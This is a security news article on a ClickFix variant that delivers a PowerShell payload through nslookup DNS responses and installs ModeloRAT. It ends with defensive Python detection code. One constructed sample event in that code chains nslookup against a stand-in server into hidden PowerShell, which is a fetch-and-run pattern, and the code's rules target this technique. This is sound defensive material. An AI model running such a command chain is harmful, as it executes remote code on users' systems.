Hackers abuse DNS queries to deliver malware payloads via new ClickFix attack

16.02.2026 | Author: Newsman

Microsoft researchers have uncovered a new ClickFix variant that, in the first observed case of its kind, uses DNS queries as the channel for malware delivery. Victims are tricked into running an nslookup command that queries an attacker-controlled DNS server; the response carries a malicious PowerShell script that ultimately installs the ModeloRAT remote access trojan.

Unlike traditional ClickFix campaigns, which fetch their payload over HTTP, this version abuses the DNS lookup itself. Victims are instructed to paste a specific command into the Windows Run dialog. The command runs nslookup against a rogue DNS server whose response is crafted so that the "Name:" field of nslookup's output contains the encoded PowerShell payload; the rest of the command extracts it and hands it to PowerShell. Once running, the script stages a Python runtime, sets up persistence through the Startup folder, and installs ModeloRAT, giving the attackers full remote control of the compromised system.

ClickFix campaigns rely heavily on social engineering: the user is convinced that their browser or operating system has an error that needs a manual "fix". The lures have evolved rapidly, with threat actors recently using fake ChatGPT pages, Grok, Claude Artifacts, and even Pastebin comments to distribute the malicious commands. Moving the payload into DNS traffic is a notable step forward in evasion.

By staging malware in DNS responses, attackers bypass web filters and proxies that inspect HTTP and blend in with the DNS traffic every host generates. Note that nslookup sends its queries straight to the server named on the command line rather than through the Windows DNS Client service, so resolver-side or host DNS-client logs will not show them; outbound DNS to anything other than approved resolvers, and nslookup launched from the Run dialog, are the signals to watch. Users are strongly advised never to copy, paste and execute commands from untrusted websites, however convincing the "error message" looks.
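As an added example (not Microsoft's analysis code and not anything from the campaign), the Python below implements the two detections a defender would want for the technique described above: process-creation telemetry checked for nslookup.exe started from the Run dialog (parent explorer.exe) or aimed at an explicit server, and for a single command line that chains nslookup into powershell; and the "Name:" value printed by nslookup checked for data that does not look like a hostname. The name heuristic is general, not tied to this campaign, so it also catches other data carried in DNS names. Every record, name, address and threshold is a constructed assumption for the demo.

```python
"""Heuristics for spotting DNS-staged ClickFix activity.

Added example, not Microsoft's code or the campaign's tooling. All sample
records below are constructed; thresholds are assumptions to tune against
your own DNS and process baselines.
"""
import base64
import math
import re
from collections import Counter

# Constructed Sysmon Event ID 1 style records (not real telemetry).
PROCESS_EVENTS = [
    {"Image": r"C:\Windows\System32\nslookup.exe",
     "ParentImage": r"C:\Windows\explorer.exe",          # Win+R launches via explorer.exe
     "CommandLine": "nslookup -q=a updates.example.test 203.0.113.10"},
    {"Image": r"C:\Windows\System32\cmd.exe",            # constructed chain, not the campaign's command
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'cmd.exe /c "nslookup updates.example.test 203.0.113.10 | powershell -nop -w hidden -"'},
    {"Image": r"C:\Windows\System32\nslookup.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",      # benign admin lookup via default resolver
     "CommandLine": "nslookup intranet.example.test"},
]


def _basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def flag_process_event(ev):
    """Return the reasons an event looks like DNS-staged ClickFix (empty list = clean)."""
    cmd = ev["CommandLine"]
    reasons = []
    if _basename(ev["Image"]) == "nslookup.exe":
        if _basename(ev["ParentImage"]) == "explorer.exe":
            reasons.append("nslookup started from explorer.exe (Run dialog)")
        # nslookup [options] host [server]: a second positional argument names a server,
        # i.e. the query bypasses the configured resolver.
        positional = [t for t in cmd.split()[1:] if not t.startswith("-")]
        if len(positional) >= 2:
            reasons.append("nslookup aimed at explicit server " + positional[1])
    low = cmd.lower()
    if "nslookup" in low and "powershell" in low:
        reasons.append("nslookup and powershell chained in one command line")
    return reasons


# Hostname heuristics (assumed values; hostnames rarely approach these).
MAX_LABEL_LEN = 40
MAX_NAME_LEN = 100
ENTROPY_BITS = 4.2
ENTROPY_MIN_LEN = 30


def shannon_entropy(s):
    """Bits per character of s."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def suspicious_dns_name(name):
    """Return reasons a DNS name looks like carried data rather than a hostname."""
    labels = [l for l in name.rstrip(".").split(".") if l]
    body = "".join(labels)
    reasons = []
    if any(len(l) > MAX_LABEL_LEN for l in labels):
        reasons.append("label longer than %d chars" % MAX_LABEL_LEN)
    if len(body) > MAX_NAME_LEN:
        reasons.append("name longer than %d chars" % MAX_NAME_LEN)
    ent = shannon_entropy(body)
    if len(body) >= ENTROPY_MIN_LEN and ent > ENTROPY_BITS:
        reasons.append("high entropy (%.2f bits/char)" % ent)
    return reasons


NAME_LINE = re.compile(r"^\s*Name:\s*(\S+)", re.MULTILINE)


def names_from_nslookup_output(text):
    """Extract the value(s) nslookup printed after 'Name:'."""
    return NAME_LINE.findall(text)


def encoded_name_stand_in():
    """Constructed answer name: base64 text cut into DNS-sized (<= 63 byte) labels."""
    data = base64.b64encode(
        b"constructed stand-in for an encoded script body, not a real payload"
    ).decode().rstrip("=")
    labels = [data[i:i + 63] for i in range(0, len(data), 63)]
    return ".".join(labels) + ".example.test"


# Constructed nslookup output in the layout Windows nslookup prints.
SAMPLE_NSLOOKUP_OUTPUT = (
    "Server:  UnKnown\nAddress:  203.0.113.10\n\n"
    "Name:    " + encoded_name_stand_in() + "\nAddress:  203.0.113.10\n"
)


if __name__ == "__main__":
    for ev in PROCESS_EVENTS:
        print(ev["CommandLine"][:48], "->", flag_process_event(ev) or "clean")
    for n in names_from_nslookup_output(SAMPLE_NSLOOKUP_OUTPUT):
        print(n[:40] + "...", "->", suspicious_dns_name(n))
```

The process-side rules are the ones that matter on the endpoint: because nslookup resolves through its own socket rather than the DNS Client service, host DNS-client telemetry will not record the query, so the launch of nslookup.exe from explorer.exe with an explicit server argument is the earliest host signal. The name heuristic belongs on a network DNS sensor or resolver egress logs, with the label, length and entropy thresholds tuned against the legitimate long names (CDN and cloud hostnames) your environment actually resolves.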
